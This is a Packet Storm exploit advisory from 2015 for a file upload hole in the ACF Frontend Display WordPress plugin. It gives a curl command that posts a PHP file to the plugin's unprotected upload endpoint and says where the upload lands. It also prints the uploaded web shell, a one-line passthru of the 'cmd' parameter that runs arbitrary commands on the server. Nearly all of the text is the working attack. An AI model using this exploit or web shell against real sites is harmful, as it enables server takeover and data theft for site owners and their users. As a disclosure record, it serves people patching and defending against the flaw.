WordPress ACF Frontend Display Shell Upload

2015-07-06T00:00:00
ID PACKETSTORM:132590
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2015-07-06T00:00:00

Description

                                        
                                            `+---------------------------------------------------------------------------+   
#[+] Author: TUNISIAN CYBER   
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability   
#[+] Date: 3-07-2015   
#[+] Type: WebAPP   
#[+] Tested on: KaliLinux   
#[+] Friendly Sites: sec4ever.com   
#[+] Twitter: @TCYB3R   
+---------------------------------------------------------------------------+   
  
curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"   
  
File Path:   
site/wp-content/uploads/uigen_YEAR/file.php   
  
Example:   
site/wp-content/uploads/uigen_2015/evil.php   
  
evil.php:   
<?php passthru($_GET['cmd']); ?>   
  
POC:   
http://i.imgur.com/7rQClr6.png   
  
  
TUNISIAN CYBER(miutex)-S4E  
`